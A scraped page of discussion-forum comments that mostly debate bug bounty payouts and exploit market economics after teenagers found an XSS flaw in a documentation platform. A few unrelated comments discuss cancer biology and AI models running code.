That's a limited view. The damage this could cause should be accounted for. People don't have to sell shit, they could fuck things up just for the fun of it. That's something to consider, especially with a bunch of teenagers. Now, these big corpos didn't take the chance to sponsor and encourage these kids early careers and make this fuck-up good PR, at least.
That's not how economics works. I can't do my job without a computer or glasses but that doesn't mean I can pay the suppliers of these things most of my salary each. Preventing a 100k€ problem says almost nothing about what the payout should be. As for them just causing chaos for fun, that nets them just about nothing (what's an evening of fun worth, like what are you willing to pay for a cinema ticket?). This is certainly more (hundreds of times more) and so covers that risk as well
In an ideal world, these bugs, especially low-hanging fruits, shouldn't be discoverable by some random kids. These billion dollar companies should have their own security researchers constantly monitoring their stack. But those costs are cut, because the law de facto doesn't hold them liable for getting hacked. It's a very good deal for companies to pay bug bounties, but they mostly cheap out on that, too.
It's like a finders reward elsewhere in life. If you lost your wallet, your immaterial and material loss is quite high, but apart from cash the contents are of way less value for a finder/thief. These type of rewards are meant to manipulate emotions and motivation. Twitter paid these kids each between $1 and $20. That's insulting. As I said elsewhere, bug bounties are PR. And it's bad PR in this case. Black market pricing is the absolute low end for valuation (it's basically the cash value in the wallet example).
> these bugs, especially low-hanging fruits, shouldn't be discoverable by some random kids. These billion dollar companies should have their own security researchers [...]
I'm twice this kid's age and have been doing this hobby-turned-work as long as they have. I can tell you the work we do is no different. It doesn't matter if you're 16 or 64 or what your credentials are or salary is. We're all just hackers. Hacker ethos is judging by skill, not appearance. Welcome to hacker news :P
> Twitter paid these kids each between $1 and $20.
The submission doesn't say they've even contacted Xitter. I thought it was in the title just to drop names that we've heard of that used this dependency. Did you legit find somewhere that they got ≤20$ for an exploitable XSS on the x.com or twitter.com domains? That is definitely a strangely low amount but then I'm not surprised by anything where Elon is involved. It could also have been a silent fix without even replying to the reporter; I've had that often enough. But yeah from X I would expect a few hundred dollars at least and from old twitter (or another legit business) more than that (as Discord demonstrated)
Get off your high horse. In this instance it's been a kid, and it does not concern some highly arcane flaw in a crypto library or chained kernel exploit, which may have passed even a pro. I already implied this bug should have been found by in-house security, so obviously it's within the domain of professionals and teenagers alike.
> The submission doesn't say they've even contacted Xitter.
This one doesn't. This one does: https://heartbreak.ing/. Or at least, I presume they meant Twitter when they wrote "one company valued 44 billion".
> Unfortunately a competitive rate agreed to in advance with a company before we do any pentesting is the only way we have ever been able to get paid fairly for this sort of work.
So, rough estimate, how much would you have made for this?
We normally find things like this in our usual 60 hour audit blocks. Rates change over time with demand, but today an audit of that length would be $27k.
Even that is quite cheap compared to letting a blackhat find this.
If I can ask on business model, as I have a friend with a similar predicament — what percent of the time do you find vulnerabilities in those audits? Do companies push back if you don't find vulnerabilities?
We have never issued a clean report in our ~5 years of operation.
Some firms have a reputation for issuing clean reports that look good to bosses and customers, but we prefer working with clients that want an honest assessment of attack surface and how motivated blackhats will end their business.
We also stick around on retainer for firms that want security engineering consulting after audits to close the gaps we find and re-architect as needed. Unused retainer hours go into producing a lot of open source software to accelerate fixing the problems we see most often. This really incentivizes us to produce comprehensive reports that take into account how the software is developed and used in the real world.
Under our published threat model few companies pass level one, and we have helped a couple get close to level 2 with post audit consulting.
Our industry has a very long way to go as current industry standard practices are wildly dangerous and make life easy for blackhats.
As someone in a related line of work: we find vulnerabilities so close to 100% of the time that it might as well be 100% of the time. Whether they're practically exploitable or surpass your risk appetite is the real question.
These companies almost always produce "vulnerabilities", but they're also almost always trash.
"Finding: This dependency is vulnerable to CVE-X, update it, severity S". And then of course that dependency is only used during development, the vulnerable code isn't called, and they didn't bother to dig into that.
"Finding: Server allows TLS version 1.1, while it's recommended to only support version 1.2+", yeah, sure, I'm sure that if someone has broken TLS 1.1, they're coming for me, not for the banks, google, governments, apple, etc, everyone else still using TLS 1.1
... So yeah, all the audits will have "findings", they'll mostly be total garbage, and they'll charge you for it. If you're competent, you aren't going to get an RCE or XSS out of a security audit since it simply will not be there.
At Distrust we do not comment on specific dependency CVEs unless they are likely exploitable, or there are a lot of them pointing at bigger problems in the overall approach to dependency management.
That said, a policy of blindly updating dependencies to patch irrelevant CVEs is itself, a very real security vulnerability, because pulling in millions of lines of code no one reviews from the internet regularly makes you an easy target for supply chain attacks.
We have pulled off supply chain attacks on our clients a few times who were not otherwise convinced they were a real threat.
If a $500 drone is coming for your $100M factory, the price limit for defense considerations isn't $500.
In the end, you are trying to encourage people not to fuck with your shit, instead of playing economic games. Especially with a bunch of teenagers who wouldn't even be fully criminally liable for doing something funny. $4K isn't much today, even for a teenager. Thanks to stupid AI shit like Mintlify, that's like worth 2GB of RAM or something.
It's not just compensation, it's a gesture. And really bad PR.
That's not how any of this works. A price for a vulnerability tracking the worst-case outcome of that vulnerability isn't a bounty or a market-clearing price; it's a shakedown fee. Meanwhile: the actual market-clearing price of an XSS vulnerability is very low (in most cases, it doesn't exist at all) because there aren't existing business processes those vulnerabilities drop seamlessly into; they're all situational and time-sensitive.
> the actual market-clearing price of an XSS vulnerability is very low (in most cases, it doesn't exist at all) because there aren't existing business processes those vulnerabilities drop seamlessly into; they're all situational and time-sensitive.
Could you elaborate on this? I don't fully understand the shorthand here.
I'm happy to answer questions but the only thing I could think to respond with here is just a restatement of what I said. I was terse; which part do you want me to expand on? Sorry about that!
> because there aren't existing business processes those vulnerabilities drop seamlessly into; they're all situational and time-sensitive.
what's an example of an existing business process that would make them valuable, just in theory? why do they not exist for xss vulns? why, and in what sense, are they only situational and time-sensitive?
i know you're an expert in this field. i'm not doubting the assertions just trying to understand them better. if i understand you're argument correctly, you're not doubting that the vuln found here could be damaging, only doubting that it could make money for an adversary willing to exploit it?
I can't think of a business process that accepts and monetizes pin-compatible XSS vulnerabilities.
But for RCE, there's lots of them! RCE vulnerabilities slot into CNE implants, botnets, ransomware rigs, and organized identity theft.
The key thing here is that these businesses already exist. There are already people in the market for the vulnerabilities. If you just imagine a new business driven by XSS vulnerabilities, that doesn't create customers, any more than imagining a new kind of cloud service instantly gets you funded for one.
I wonder what you think of this, re: the disparity between the economics you just laid out and the "companies are such fkn misers!" comments that always arise in these threads on bounty payouts...
I've seen first hand how companies devalue investment in security -- after all, it's an insurance policy whose main beneficiaries are their customers. Sure it's also reputational insurance in theory, but what is that compared with showing more profit this quarter, or using the money for growth if you're a startup, etc. Basically, the economic incentives are to foist the risks onto your customers and gamble that a huge incident won't sink you.
I wonder if that background calculus -- which is broadly accurate, imo -- is what rankles people about the low bounty rewards, especially from companies that could afford more?
The premise that "fucking companies are misers" operate on that I don't share is that vulnerabilities are finite and that, in the general case, there's an existential cost to not identifying and fixing them. From decades of vulnerability research work, including (over the past 5 years) as a buyer rather than a seller of that work: put 2 different teams on a project, get 2 different sets of vulnerabilities, with maybe 30-50% overlap. Keep doing that; you'll keep finding stuff.
Seen through that light, bug bounty programs are engineering services, not a security control. A thing generalist developers definitely don't get about high-end bug bounty programs is that they are more about focusing internal resources than they are about generating any particular set of bugs. They're a way of prioritizing triage and hardening work, driven by external incentives.
The idea that Discord is, like, eliminating their XSS risk by bidding for XSS vulnerabilities from bounty hunters; I mean, just, obviously no, right?
How does stealing someone social media accounts not slot into "organized identity theft"?
... actually: how is XSS not a form of RCE? The script is code; it's executed on the victim's machine; it arrives remotely from the untrusted, attacker-controlled source.
And with the legitimate first-party's permissions and access, at that. It has access to things within the browser's sandbox that it probably really shouldn't. Imagine if a bank had used Mintlify or something similar to implement a customer service portal, for example.
You're misreading me. It's organized identity theft driven by pin-compatible RCE exploits. Is there already an identity theft ring powered by Mintlify exploits? No? Then it doesn't matter.
The subtlety here is the difference between people using an exploit (certainly they can) and people who buy exploits for serious money.
A remote code execution bug in ios is valuable - it may take a long time to detect exploitation (potentially years if used carefully), and even after being discovered there is a long tail of devices that take time to update (although less so than on android, or linux run on embedded devices that can’t be updated)
That’s why it’s worth millions on the black market and apple will pay you $2 million dollars for it
An XSS is much harder to exploit quietly (the server can log everything), and can be closed immediately 100% with no long tail. At the push of an update the vulnerability is now worth zero. Someone paying to purchase an XSS is probably intending to use it once (with a large blast radius) and get as much as they can from it in the time until it is closed (hours? maybe days?)
Just because on average the intelligence agencies or ransom ware distributors wouldn't pay big bucks for XSS on Zerodium etc. doesn't mean that's setting the fair, or wise price for disclosure. Every bug bounty program is mostly PR mitigation. It's bad PR if you underpay for a disclosed vulnerability, which may have ended your business, considering the price of security audits/practices you cheaped out on. I mean, most bug bounty programs are actually paid by scope, not market price for technically comparable exploits. If you found an XSS vulnerability in an Apple service with this scope, I bet you would have been paid more than 4k.
I do not in fact think you would make a lot more than $4000, or even $4000 in the first place, for an Apple XSS bug, unless it was extraordinarily situationally powerful (for instance, a first-stage for a clean, direct RCE). Bounty prices have nothing at all to do with the worst-case damage a motivated actor could cause with a vulnerability.
Nice, I hadn't seen that. Well, there you go: the absolute most you're going to make for the absolute worst-case XSS bug at the largest software firm in the world.
> because Apple has been so thoroughly not-invested in gaming
Is Apple invested in anything at all right now? Seems like they are only ever iterating over the same products in their idiotically domain separated legacy zoo of devices. Lately even fucking that up with UI "innovation" literally everyone hates. I mean, who's talking about Apple VR anymore? Apple AI is a meme. What are they cooking with all that cash?
I am sure, you hold the employer to the same standards. For example disclosing salary range information beforehand, or writing rejection letters afterwards, so applicants going through the trouble of doing their part aren't wasting their time and energy.
> I am sure, you hold the employer to the same standards
I most certainly do!
Incidentally, the very idea of not providing a salary range is truly baffling. I'm amazed any such advertisements generate applicants; other than those phoning up the HR department to tell them to stop pissing about and please state the salary.
> But I was curious if there is working happening on L1 defence — fixing the enzyme that fixes the wrong copy paste mechanism. Or making the enzyme get more efficient and powerful. Is that line of thought even valid?
Mutations in general are not the defining quality of cancer. It's mutations in these very L1 safeguards. There are several such safeguards and a cell needs several mutations in those to become malignant. Eg. https://en.wikipedia.org/wiki/P53
Correcting genes only works in certain conditions (e.g. limited single strand breaks), in a narrow time frame during cell division, safeguards rather trigger cell suicide, or if that fails they mark the cell for destruction by immune cells. A cell can't fix DNA which made it through cell division once, because it got nothing to proof-read against.
After the safeguards are gone, everything goes and genetic diversity increases quickly within each tumor. This diversity is what's making cancer treatment hard. At some point there won't be a shared vulnerability in all malignant cells. The repair mechanisms are working in favor of the cancer now. For example, with radiation therapy you preferably want to induce DNA double strand breaks, because cancer cells can't repair those. Otherwise you need to increase the radical burden enough to overwhelm repair, but migrating radicals may damage distant cells, too.
I presume you could hypothetically inject mRNA of a working safeguard gene (eg. P53) into all cells (at some point cancer cells can't be selected exclusively, since they lost identifying marks and present as stem cells), so the functional enzyme or transcription factor is forced to be built inside. I am sure people are trying this right now. However, the inner workings of cells on a molecular level are insanely complex and our understanding is only scratching the surface. As with P53, you have a transcription factor, which means it's modifying gene expressions elsewhere. It's only a small part of a complex regulatory cascade. I doubt there is a safeguard target, which can easily be injected without considering the precise timing and environment within that safeguard cascade in the cell. Of course, the rest of the safeguard system needs to be present in the cell to begin with. Mind you, you don't want to cause cell suicide in healthy cells, so you want to restore the function of whole selective complex.
Then there is the question of delivery. Can you deliver eg. the mRNA to every cell without raising suspicion of the immune system? With the COVID vaccine, the enabling breakthrough was the delivery vehicle, not as much the mRNA part. Can you even reach the cancer cells at all? Cancer cells are frequently cloaked, shadowed or cut of by senescent, or necrotic cells, or acquired unique ways of metabolic adaptations. A bit similar to bacterial persistence, like M. tuberculosis, which can evade bodily and chemical defenses for decades.
The take-away: Life is complex beyond comprehension! Despite simplifications taught in schools and reductionist zeitgeist, we actually know very, very little about what's going on in genetics and molecular biology, most medical knowledge is empiric guessing instead of explanatory understanding.
> At the most basic level this means making sure they can run commands to execute the code
Yeah, it's gonna be fun waiting for compilation cycles when those models "reason" with themselves about a semicolon. I guess we just need more compute...
reply